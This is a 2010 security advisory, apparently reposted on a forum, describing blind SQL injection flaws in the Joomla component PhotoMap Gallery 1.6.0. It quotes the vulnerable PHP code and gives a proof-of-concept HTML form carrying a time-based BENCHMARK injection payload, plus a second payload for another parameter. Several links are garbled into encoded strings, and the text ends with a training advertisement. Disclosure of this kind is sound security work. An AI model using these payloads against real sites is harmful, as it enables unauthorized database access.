Name PhotoMap Gallery
Vendor
d70K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3g2^5N6r3g2F1M7$3W2G2L8Y4y4Q4x3X3g2B7L8$3!0E0L8r3q4Q4x3X3g2G2M7X3N6Q4x3V1k6W2P5s2c8W2L8Y4y4A6L8$3&6K6i4K6u0r3M7r3S2G2N6r3!0K6i4K6u0V1j5g2)9J5k6r3W2E0j5h3N6W2M7#2)9J5c8Y4m8Z5L8%4c8G2i4K6u0V1k6$3q4D9L8r3g2J5P5g2)9J5c8U0p5H3y4U0f1^5i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
Versions Affected 1.6.0
Author Salvatore Fresta aka Drosophila
Website
4cbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4S2L8s2k6S2N6r3!0J5k6h3k6J5k6i4y4@1j5g2)9J5k6h3&6W2N6q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-28
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
PhotoMap Gallery is a gallery component completely
integrated into Joomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio', you can easily add geo-tags to your
photos so that you can remember exactly where they're
from using Google Maps.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
_______________________________
The parameter id passed to controller.php via POST when
view is set to user and task is set to save_usercategory
is not properly sanitised before being used in a SQL
query. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
The parameter folder passed to imagehandler.php is not
properly sanitised before used in a SQL query. This can
be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
The following is the affected code.
controller.php (line 1135):
function save_usercategory() {
// Check for request forgeries
JRequest::checkToken() or jexit( 'Invalid Token' );
$user = & JFactory::getUser();
$task = JRequest::getVar('task');
$post = JRequest::get('post');
//perform access checks
$isNew = ($post['id']) ? false : true;
// $catid = (int) JRequest::getVar('catid', 0);
$db =& JFactory::getDBO();
$query = 'SELECT c.id, c.directory'
. ' FROM #__g_categories AS c'
. ' WHERE c.id = '.$post['id'];
imagehandler.php (line 109);
function getList() {
static $list;
// Only process the list once per request
if (is_array($list)) {
return $list;
}
// Get folder from request
$folder = $this->getState('folder');
$search = $this->getState('search');
$query = 'SELECT *'
. ' FROM #__g_categories'
. ' WHERE id = '.$folder;
IV. SAMPLE CODE
_______________
A) Multiple Blind SQL Injection
Replace 89eb36eca1919aff534b13b54796c9a4 with your own.
<html>
<head>
<title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
</head>
<body>
<form method="POST" action="http://127.0.0.1/joomla/index.php">
<input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
<input type="hidden" name="option" value="com_photomapgallery">
<input type="hidden" name="controller" value="">
<input type="hidden" name="view" value="user">
<input type="hidden" name="task" value="save_usercategory">
<input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
<input type="submit">
</form>
</body>
</html>
37aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6H3K9r3!0@1L8$3#2S2M7r3N6S2L8r3I4W2M7Y4W2Q4x3U0k6$3K9h3g2%4i4K6y4p5K9h3#2S2k6$3g2Z5j5h3&6V1L8r3g2J5i4K6t1$3k6X3!0D9k6r3g2J5i4K6y4p5i4K6u0V1x3b7`.`. OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
V. FIX
______
No fix.
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
